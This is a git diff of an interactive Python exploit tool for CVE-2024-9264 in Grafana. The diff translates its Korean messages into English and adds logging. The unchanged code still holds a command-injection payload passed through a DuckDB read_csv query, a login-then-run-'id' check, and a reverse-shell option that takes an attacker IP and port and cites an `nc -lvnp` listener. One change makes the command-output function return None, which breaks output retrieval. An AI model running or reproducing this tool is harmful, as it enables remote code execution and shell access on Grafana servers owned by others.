diff --git a/CVE-2024-9264/exploit.py b/CVE-2024-9264/exploit.py index bac4ac0..44c0535 100644 --- a/CVE-2024-9264/exploit.py +++ b/CVE-2024-9264/exploit.py @@ -79,7 +79,7 @@ class GrafanaExploit: if "buildInfo" in data and "version" in data["buildInfo"]: return data["buildInfo"]["version"] except Exception as e: - error(f"버전 확인 실패: {e}") + error(f"Version Check Failed: {e}") return "Unknown" def login(self) -> bool: @@ -91,7 +91,7 @@ class GrafanaExploit: if r.status_code == 200 and "Logged in" in r.text: return True except Exception as e: - error(f"로그인 실패: {e}") + error(f"Login Failed: {e}") return False def run_query(self, query: str) -> Optional[List[Any]]: @@ -151,19 +151,19 @@ class GrafanaExploit: f"SELECT * FROM read_csv('{cmd} >{tmp_file} 2>&1 |')" ) self.run_query(query) - return self.read_remote_file(tmp_file) + return None # ------------------------- # 메뉴 실행 # ------------------------- def menu(): - print("\n[ 메뉴 ]") - print("1) 버전 탐색") - print("2) 취약한 버전과 비교") - print("3) 익스플로잇 (id 실행)") - print("4) 리버스 셸 획득") - print("5) 나가기") + print("\n[ Menu ]") + print("1) Version Check") + print("2) Vuln Check") + print("3) Exploit") + print("4) Exploit with Reverse Shell") + print("5) Exit") if __name__ == "__main__": if len(sys.argv) < 2: @@ -171,6 +171,7 @@ if __name__ == "__main__": sys.exit(1) url = sys.argv[1] + info("Taget URL: " + url) exploit = GrafanaExploit(url) while True: @@ -178,14 +179,15 @@ if __name__ == "__main__": choice = input(">> ") if choice == "1": - info("Grafana 버전 확인 중...") + log_event("Version Check Started") + info("Checking Grafana Version...") ver = exploit.get_version() - print("Grafana Version:", ver) + vuln("Grafana Version: " + ver) elif choice == "2": - info("취약 버전 리스트와 비교 중...") + log_event("Vuln Check Started") ver = exploit.get_version() - print("현재 Grafana Version:", ver) + info("Current Grafana Version: " + ver) # CVE-2024-9264 영향/패치 버전 목록 patched_versions = [ @@ -204,48 +206,51 @@ if __name__ == "__main__": min_patched = min(Version(v) for v in patched_versions) if curr < vs: - success(f"{ver} 은 11.0.0 이전 버전으로, CVE-2024-9264 영향 없음.") + success(f"{ver} is not vulnerable to CVE-2024-9264") elif curr >= min_patched: - success(f"{ver} 은 패치된 버전 이상입니다. 취약하지 않을 가능성이 높습니다.") + success(f"{ver} is not vulnerable to CVE-2024-9264") else: - vuln(f"{ver} 은 CVE-2024-9264에 취약합니다. 즉시 업그레이드 필요!") + vuln(f"{ver} is vulnerable to CVE-2024-9264") except InvalidVersion: - error(f"버전 파싱 실패: {ver}") + error(f"Version parse failed: {ver}") elif choice == "3": - info("로그인 시도...") + log_event("Exploit Started") + info("Trying to Login...") if exploit.login(): - success("로그인 성공") - info("PoC 실행 (id)...") + success("Login Success") + info("Exploit...") output = exploit.check_vuln() if output: - vuln("취약점 확인됨 (id 결과):") + vuln("Exploit Success (id Result):") print(output.decode(errors="ignore")) else: - success("취약점 동작 안 함") + success("Exploit is not working") else: - error("로그인 실패") + error("Login Failed") elif choice == "4": - info("리버스 셸 시도...") + log_event("Exploit with Reverse Shell Started") + info("Trying to Get Reverse Shell...") if exploit.login(): - success("로그인 성공") - lhost = input("공격자 IP (LHOST): ") - lport = input("공격자 PORT (LPORT): ") + success("Login Success") + lhost = input("Attacker IP (LHOST): ") + lport = input("Attacker PORT (LPORT): ") try: lport = int(lport) - info(f"리버스 셸 연결 시도 ({lhost}:{lport})") - print(Fore.YELLOW + f"[!] 공격자 측에서 `nc -lvnp {lport}` 실행 중이어야 합니다.") + info(f"Trying to Connect Reverse Shell ({lhost}:{lport})") + info(f"Attacker must be running `nc -lvnp {lport}` Command") exploit.reverse_shell(lhost, lport) - vuln("리버스 셸 페이로드 전송 완료.") + vuln("Reverse Shell Query Transmission Success.") except Exception as e: - error(f"리버스 셸 실행 오류: {e}") + error(f"Reverse Shell not working: {e}") else: - error("로그인 실패") + error("Login Failed") elif choice == "5": - info("프로그램 종료") + log_event("Exit Started") + info("Exiting...") break else: - error("잘못된 입력") + error("Wrong Input")